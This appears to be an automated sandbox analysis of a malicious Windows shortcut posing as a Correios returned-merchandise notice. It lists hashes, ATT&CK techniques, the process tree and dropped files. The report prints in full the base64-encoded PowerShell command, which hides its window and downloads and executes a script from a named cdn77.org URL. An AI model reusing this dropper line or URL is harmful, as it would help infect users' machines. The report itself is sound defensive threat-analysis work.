b82b79181cdd7422ac575c5e23f7df3e4ec3cf4181e1dd9ae4bf6ec4b8358cb8

General

Target

Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	3988	powershell.exe
9	3988	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3988	powershell.exe
3988	powershell.exe
3988	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3988	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3012 wrote to memory of 3988	3012	cmd.exe	84
PID 3012 wrote to memory of 3988	3012	cmd.exe	84
PID 3988 wrote to memory of 2016	3988	powershell.exe	88
PID 3988 wrote to memory of 2016	3988	powershell.exe	88
PID 2016 wrote to memory of 4084	2016	csc.exe	89
PID 2016 wrote to memory of 4084	2016	csc.exe	89

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3012
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3988
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cqbnvt2z\cqbnvt2z.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2016
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C64.tmp" "c:\Users\Admin\AppData\Local\Temp\cqbnvt2z\CSCF3FCCC412AC43CAA538B3959A815575.TMP"
      4⤵
      PID:4084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7C64.tmp

Filesize
1KB

MD5
5ef56b65fa4ea3c778b5107b936e1fdf

SHA1
aecda837ca0cc78eec2451c8c7a081858ef03b48

SHA256
f87ac8c915c7ef9f2aac338632ee009eca7bfc4895b55edbadcb763979d9e8d1

SHA512
a8d91c27d44547c39c62053a618c6b29eca5f77c4c0d7da70a4d5940ca354836d5f649a7b13245b45647802945c8d3cc6a44b4efd506176d4ddc98bf2b7d1428

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rtzb5esu.pco.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cqbnvt2z\cqbnvt2z.dll

Filesize
3KB

MD5
18d39bcfff10e6a87155bdeb810c9614

SHA1
67caab69e4da633252776837a94cce56e86de762

SHA256
41d1727d747e19002a73c5b2c9e40d8c159cd73b53a75ee53a36dc6616c18d3b

SHA512
5cdb91509d039a78e8ec941ea4294aa63e793aa0e47d0a26b44553aadfa51b0c17a228a4a44027f7157003f8f6cd44530f5b8951844777d51dcdfd8aaaab9197

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cqbnvt2z\CSCF3FCCC412AC43CAA538B3959A815575.TMP

Filesize
652B

MD5
4ccb221661f6eef725bbb317da18628f

SHA1
2e8a1146b0d95df880a2c2fd7d4b5c7e264dc362

SHA256
463d47143a9fd2590115599e77e9b0be8fae9f6fa892b2277e734ac8937c0ed5

SHA512
5d09bb1279eef44c2cfb06d62e65066d4932e057448b6c279862877e55f96e2192da49f6770e1cc7d0a4a4522431065c91c75383518f9922aacfed1e4b24a432

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cqbnvt2z\cqbnvt2z.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cqbnvt2z\cqbnvt2z.cmdline

Filesize
369B

MD5
19ce55663e73b33b472055481bcbbd5c

SHA1
c4dde5a9efdd2e9fb6fac9346626ae588b1a4946

SHA256
c2783c303cdabb29d3781f69eae366f691fb48c3019366aece9ee3de088e4644

SHA512
5c9f3cb1aba95f01457ef06ee444da2e61e85fb1891e2e47a720f502d466c1b6cbf836de75bc830834287fea76ac4120d7990a3f1fdc4dc2897dd4d056196c04

Download Submit
memory/3988-2-0x00007FF83DCD3000-0x00007FF83DCD5000-memory.dmp

Filesize
8KB

Download
memory/3988-3-0x00000235DAFB0000-0x00000235DAFD2000-memory.dmp

Filesize
136KB

Download
memory/3988-13-0x00007FF83DCD0000-0x00007FF83E791000-memory.dmp

Filesize
10.8MB

Download
memory/3988-14-0x00007FF83DCD0000-0x00007FF83E791000-memory.dmp

Filesize
10.8MB

Download
memory/3988-27-0x00000235C2E10000-0x00000235C2E18000-memory.dmp

Filesize
32KB

Download
memory/3988-31-0x00007FF83DCD0000-0x00007FF83E791000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing